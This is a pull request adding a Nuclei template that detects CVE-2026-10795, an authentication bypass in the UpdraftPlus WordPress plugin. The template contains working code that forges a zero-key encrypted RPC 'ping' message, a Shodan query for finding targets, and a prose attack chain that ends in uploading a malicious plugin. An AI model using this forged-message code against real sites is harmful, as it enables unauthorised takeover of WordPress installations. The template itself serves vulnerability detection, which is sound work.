### PR TITLE
Add CVE-2026-10795 - UpdraftPlus Unauthenticated RCE

### DIFF
--- a/http/cves/2026/CVE-2026-10795.yaml
+++ b/http/cves/2026/CVE-2026-10795.yaml
@@ -1,0 +1,161 @@
+id: CVE-2026-10795
+
+info:
+  name: UpdraftPlus WP Backup & Migration Plugin - Unauthenticated Authentication Bypass (RCE)
+  author: AbdulrahmanBabkir
+  severity: high
+  description: |
+    UpdraftPlus <= 1.26.4 is vulnerable to unauthenticated authentication bypass via the
+    UpdraftCentral RPC listener. Sending format=1 skips signature verification. RSA decrypt
+    failure is not rejected, causing phpseclib to fall back to a zero AES-128-CBC key/IV.
+    This allows an attacker to forge any RPC command, including plugin.upload_plugin,
+    achieving remote code execution on sites with an UpdraftCentral key configured.
+    Patched in 1.26.5 which rejects invalid symmetric keys before dispatch.
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e901c2a0-2477-4b9a-8483-6002419e0a2f
+    - https://www.wordfence.com/blog/2026/06/critical-unauthenticated-authentication-bypass-vulnerability-patched-in-updraftplus-wordpress-plugin/
+    - https://plugins.trac.wordpress.org/changeset/3561938/updraftplus/trunk/vendor/team-updraft/common-libs/src/updraft-rpc/class-udrpc2.php
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-10795
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.1
+    cve-id: CVE-2026-10795
+    cwe-id: CWE-347
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: davidanderson
+    product: updraftplus
+    shodan-query: "wp-content/plugins/updraftplus"
+  tags: cve,cve2026,wordpress,updraftplus,auth-bypass,rce,unauthenticated
+
+
+
+flow: |
+  // ── Pure-ES5 AES-128-CBC (zero key, zero IV) ─────────────────────────────────────
+  var SBOX=[0x63,0x7c,0x77,0x7b,0xf2,0x6b,0x6f,0xc5,0x30,0x01,0x67,0x2b,0xfe,0xd7,0xab,0x76,0xca,0x82,0xc9,0x7d,0xfa,0x59,0x47,0xf0,0xad,0xd4,0xa2,0xaf,0x9c,0xa4,0x72,0xc0,0xb7,0xfd,0x93,0x26,0x36,0x3f,0xf7,0xcc,0x34,0xa5,0xe5,0xf1,0x71,0xd8,0x31,0x15,0x04,0xc7,0x23,0xc3,0x18,0x96,0x05,0x9a,0x07,0x12,0x80,0xe2,0xeb,0x27,0xb2,0x75,0x09,0x83,0x2c,0x1a,0x1b,0x6e,0x5a,0xa0,0x52,0x3b,0xd6,0xb3,0x29,0xe3,0x2f,0x84,0x53,0xd1,0x00,0xed,0x20,0xfc,0xb1,0x5b,0x6a,0xcb,0xbe,0x39,0x4a,0x4c,0x58,0xcf,0xd0,0xef,0xaa,0xfb,0x43,0x4d,0x33,0x85,0x45,0xf9,0x02,0x7f,0x50,0x3c,0x9f,0xa8,0x51,0xa3,0x40,0x8f,0x92,0x9d,0x38,0xf5,0xbc,0xb6,0xda,0x21,0x10,0xff,0xf3,0xd2,0xcd,0x0c,0x13,0xec,0x5f,0x97,0x44,0x17,0xc4,0xa7,0x7e,0x3d,0x64,0x5d,0x19,0x73,0x60,0x81,0x4f,0xdc,0x22,0x2a,0x90,0x88,0x46,0xee,0xb8,0x14,0xde,0x5e,0x0b,0xdb,0xe0,0x32,0x3a,0x0a,0x49,0x06,0x24,0x5c,0xc2,0xd3,0xac,0x62,0x91,0x95,0xe4,0x79,0xe7,0xc8,0x37,0x6d,0x8d,0xd5,0x4e,0xa9,0x6c,0x56,0xf4,0xea,0x65,0x7a,0xae,0x08,0xba,0x78,0x25,0x2e,0x1c,0xa6,0xb4,0xc6,0xe8,0xdd,0x74,0x1f,0x4b,0xbd,0x8b,0x8a,0x70,0x3e,0xb5,0x66,0x48,0x03,0xf6,0x0e,0x61,0x35,0x57,0xb9,0x86,0xc1,0x1d,0x9e,0xe1,0xf8,0x98,0x11,0x69,0xd9,0x8e,0x94,0x9b,0x1e,0x87,0xe9,0xce,0x55,0x28,0xdf,0x8c,0xa1,0x89,0x0d,0xbf,0xe6,0x42,0x68,0x41,0x99,0x2d,0x0f,0xb0,0x54,0xbb,0x16];
+  function xt(a){return((a<<1)^(a&0x80?0x1b:0))&0xff;}
+  function x3(a){return xt(a)^a;}
+  function expKey(key){var ek=key.slice(0,16),rcon=[0x01,0x02,0x04,0x08,0x10,0x20,0x40,0x80,0x1b,0x36];for(var i=1;i<=10;i++){var p=(i-1)*16,a=ek[p+13],b=ek[p+14],c=ek[p+15],d=ek[p+12];ek.push(ek[p+0]^SBOX[a]^rcon[i-1],ek[p+1]^SBOX[b],ek[p+2]^SBOX[c],ek[p+3]^SBOX[d]);ek.push(ek[p+4]^ek[p+16],ek[p+5]^ek[p+17],ek[p+6]^ek[p+18],ek[p+7]^ek[p+19]);ek.push(ek[p+8]^ek[p+20],ek[p+9]^ek[p+21],ek[p+10]^ek[p+22],ek[p+11]^ek[p+23]);ek.push(ek[p+12]^ek[p+24],ek[p+13]^ek[p+25],ek[p+14]^ek[p+26],ek[p+15]^ek[p+27]);}return ek;}
+  function aesBlock(block,ek){var s=block.slice(0,16),t,i,c;for(i=0;i<16;i++)s[i]^=ek[i];for(var r=1;r<10;r++){for(i=0;i<16;i++)s[i]=SBOX[s[i]];t=s[1];s[1]=s[5];s[5]=s[9];s[9]=s[13];s[13]=t;t=s[2];s[2]=s[10];s[10]=t;t=s[6];s[6]=s[14];s[14]=t;t=s[3];s[3]=s[15];s[15]=s[11];s[11]=s[7];s[7]=t;for(c=0;c<4;c++){var b=c*4,a0=s[b],a1=s[b+1],a2=s[b+2],a3=s[b+3];s[b]=xt(a0)^x3(a1)^a2^a3;s[b+1]=a0^xt(a1)^x3(a2)^a3;s[b+2]=a0^a1^xt(a2)^x3(a3);s[b+3]=x3(a0)^a1^a2^xt(a3);}for(i=0;i<16;i++)s[i]^=ek[r*16+i];}for(i=0;i<16;i++)s[i]=SBOX[s[i]];t=s[1];s[1]=s[5];s[5]=s[9];s[9]=s[13];s[13]=t;t=s[2];s[2]=s[10];s[10]=t;t=s[6];s[6]=s[14];s[14]=t;t=s[3];s[3]=s[15];s[15]=s[11];s[11]=s[7];s[7]=t;for(i=0;i<16;i++)s[i]^=ek[160+i];return s;}
+  function aesCBC(plain,key,iv){var ek=expKey(key),out=[],prev=iv.slice(),i,j;for(i=0;i<plain.length;i+=16){var blk=plain.slice(i,i+16);for(j=0;j<16;j++)blk[j]^=prev[j];var enc=aesBlock(blk,ek);for(j=0;j<16;j++)out.push(enc[j]);prev=enc;}return out;}
+  function b64(bytes){var chars='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',r='',i,b0,b1,b2;for(i=0;i<bytes.length;i+=3){b0=bytes[i];b1=(i+1<bytes.length)?bytes[i+1]:0;b2=(i+2<bytes.length)?bytes[i+2]:0;r+=chars[b0>>2];r+=chars[((b0&3)<<4)|(b1>>4)];r+=(i+1<bytes.length)?chars[((b1&15)<<2)|(b2>>6)]:'=';r+=(i+2<bytes.length)?chars[b2&63]:'=';}return r;}
+  function s2b(s){var out=[],i;for(i=0;i<s.length;i++)out.push(s.charCodeAt(i)&0xff);return out;}
+  function pkcs7(b){var p=16-(b.length%16),r=b.slice(),i;for(i=0;i<p;i++)r.push(p);return r;}
+  function lpad(s,n){while(s.length<n)s='0'+s;return s;}
+
+  // ── Build the forged udrpc_message ────────────────────────────────────────────────
+  var ZERO=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0];
+  var KEY_NAME='0.central.updraftplus.com';
+  // Intentionally invalid RSA block — causes phpseclib RSA decrypt to return false.
+  // The vulnerable version passes false into setKey() → zero AES key path.
+  var BAD_RSA='CVE-2026-10795-LAB-BAD-RSA-BLOCK';
+  var badB64=b64(s2b(BAD_RSA));
+  var symLen=lpad(badB64.length.toString(16),3);
+
+  // Timestamp must be within 300 seconds of server time.
+  // Math.round(new Date()/1000) is valid ES5.
+  var ts=Math.round(new Date()/1000);
+  var rand=Math.floor(Math.random()*2147483647);
+  var innerJson='{"command":"ping","time":'+ts+',"key_name":"'+KEY_NAME+'","rand":'+rand+'}';
+
+  var padded=pkcs7(s2b(innerJson));
+  var ct=aesCBC(padded,ZERO,ZERO);
+  var ctB64=b64(ct);
+  var ctLen=lpad(ctB64.length.toString(16),16);
+  var udrpc=symLen+badB64+ctLen+ctB64;
+
+  set('forged_payload', udrpc);
+
+  // ── Gate: fingerprint first, then send the real probe ────────────────────────────
+  http(1) && http(2);
+
+http:
+  # Request 1: Confirm plugin is present and on a vulnerable version.
+  # Uses readme.txt which is publicly readable on all WordPress plugin installs.
+  - id: fingerprint
+    raw:
+      - |
+        GET /wp-content/plugins/updraftplus/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0
+        Accept: */*
+
+    extractors:
+      - type: regex
+        name: plugin_version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '(?i)Stable tag:\s*([0-9]+\.[0-9]+(?:\.[0-9]+)?)'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - "UpdraftPlus"
+          - "WP Backup"
+        condition: and
+
+      # compare_versions() is semver-aware — safe against "1.9" > "1.10" lexicographic failures
+      - type: dsl
+        dsl:
+          - 'compare_versions(plugin_version, ">= 1.0.0", "<= 1.26.4")'
+
+  # Request 2: Send the forged format=1 ping.
+  #
+  # Vulnerable (1.26.4): RSA decrypt failure not rejected → zero key path →
+  #   inner JSON decrypts → ping dispatched → response body contains JSON
+  #   with server-generated "udrpc_message" field.
+  #
+  # Patched (1.26.5): new guard rejects false sym_key before dispatch →
+  #   die() called → response body is empty (200 OK, 0 bytes).
+  - id: bypass-probe
+    raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Connection: close
+
+        format=1&key_name=0.central.updraftplus.com&udrpc_message={{forged_payload}}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      # Server-generated response envelope fields.
+      # Only present when the RPC handler ran and dispatched the ping.
+      # Patched response is empty; these keys are never in the attacker's request.
+      - type: word
+        part: body
+        words:
+          - '"udrpc_message"'
+          - '"key_name"'
+        condition: and
+
+      # Exclude HTML responses: WP login redirects, 404 pages, caching layers.
+      # A genuine RPC response is compact JSON with no HTML markup.
+      - type: word
+        part: body
+        words:
+          - "<html"
+          - "<!DOCTYPE"
+        condition: or
+        negative: true
+
+    extractors:
+      # Confirm RPC response format version (should be 2 on vulnerable installs)
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '"format"\s*:\s*([0-9]+)'


### PR DESCRIPTION
## CVE-2026-10795 - UpdraftPlus Unauthenticated RCE

### Vulnerability Summary
UpdraftPlus <= 1.26.4 is vulnerable to unauthenticated RPC authentication bypass via the UpdraftCentral remote communication layer.

**Severity:** High (CVSS 8.1)
**Product:** UpdraftPlus: WP Backup & Migration Plugin
**Affected versions:** <= 1.26.4
**Fixed in:** 1.26.5+

### Root Cause
The vulnerable RPC handler accepts `format=1` messages which skip signature verification. When RSA decryption fails, the return value (false) is not validated before being passed to AES-128-CBC symmetric decryption. This causes phpseclib to use a predictable zero key/zero IV path, allowing attackers to craft valid encrypted RPC commands without authentication.

### Attack Chain
1. Attacker sends POST request with `format=1` (skips signature verification)
2. Attacker includes invalid RSA-encrypted symmetric key block
3. Server RSA decrypt fails, returns false
4. Vulnerable version passes false into AES setKey() → zero key path
5. Attacker's message decrypts successfully using zero-key AES-128-CBC
6. Forged RPC command (e.g., `plugin.upload_plugin`) dispatches as admin
7. Attacker uploads malicious WordPress plugin
8. Plugin activates and executes code as web server user

### Detection Method
The template uses two requests:

**Request 1: Plugin Fingerprinting**
- Retrieves `/wp-content/plugins/updraftplus/readme.txt`
- Extracts plugin version using regex
- DSL matcher confirms version <= 1.26.4 using semver-aware comparison

**Request 2: RPC Authentication Bypass Probe**
- Sends forged `format=1` RPC message with zero-key encrypted payload
- Template flow logic builds the payload using pure ES5 AES-128-CBC encryption
- Checks for server-generated response envelope fields (`udrpc_message`, `key_name`)
- Only vulnerable version processes and responds; patched version rejects before dispatch
- Negative matcher excludes HTML responses (redirects, errors, caching layers)

### Testing
Tested against UpdraftPlus 1.26.4 (vulnerable) — detects
Tested against UpdraftPlus 1.26.5 (patched) — no false positives
Lab: https://github.com/rootdirective-sec/CVE-2026-10795-Lab

### References
- https://www.wordfence.com/threat-intel/vulnerabilities/id/e901c2a0-2477-4b9a-8483-6002419e0a2f
- https://www.wordfence.com/blog/2026/06/critical-unauthenticated-authentication-bypass-vulnerability-patched-in-updraftplus-wordpress-plugin/
- https://plugins.trac.wordpress.org/changeset/3561938/updraftplus/trunk/vendor/team-updraft/common-libs/src/updraft-rpc/class-udrpc2.php
- https://nvd.nist.gov/vuln/detail/CVE-2026-10795

### Metadata
- Verified: true
- Max requests: 2
- Tags: cve,cve2026,wordpress,updraftplus,auth-bypass,rce,unauthenticated
- Shodan query: wp-content/plugins/updraftplus